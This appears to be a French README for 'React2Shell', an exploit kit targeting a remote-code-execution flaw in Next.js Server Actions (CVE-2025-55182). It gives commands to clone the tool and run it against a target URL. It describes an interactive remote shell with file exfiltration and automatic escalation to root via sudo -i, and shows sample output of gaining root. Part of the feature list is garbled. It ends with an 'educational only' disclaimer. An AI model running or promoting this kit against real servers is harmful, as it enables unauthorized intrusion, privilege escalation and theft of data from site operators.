
Kit d'exploitation avancé pour les actions serveur Next.js (CVE-2025-55182)
Kit d'exploitation avancé pour les Server Actions Next.js (CVE-2025-55182).
React2Shell est un puissant wrapper de shell interactif conçu pour exploiter la vulnérabilité React2Shell. Il va au-delà du simple RCE en offrant un historique des commandes, des capacités de transfert de fichiers et des stratégies automatisées d'élévation de privilèges.
base64 | sudo -i) pour contourner les restrictions shell et passer à root instantanément..download <remote> [local] : Téléchargement fiable de fichiers binaires en utilisant l'encodage base64..save : Enregistre la sortie de la commande dans des fichiers de preuve locaux.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
Exécutez avec la détection de stratégie de persistance root vérifiée :
python3 react2shell.py -u https://target.com/
Une fois dans le shell :
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
UNIQUEMENT À DES FINS ÉDUCATIVES. Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par cet outil. Ne scannez ou n'exploitez pas des cibles pour lesquelles vous n'avez pas d'autorisation explicite de tester.
Développé pour les tests d'intrusion éthiques et les opérations de red team.
| Commande | Description |
|---|
.root | Active/Désactive le mode root (encapsule les commandes dans sudo -i) |
.download <file> | Télécharge un fichier depuis le serveur distant |
.save | Enregistre la sortie de la dernière commande dans un fichier |
.exit | Quitte le shell |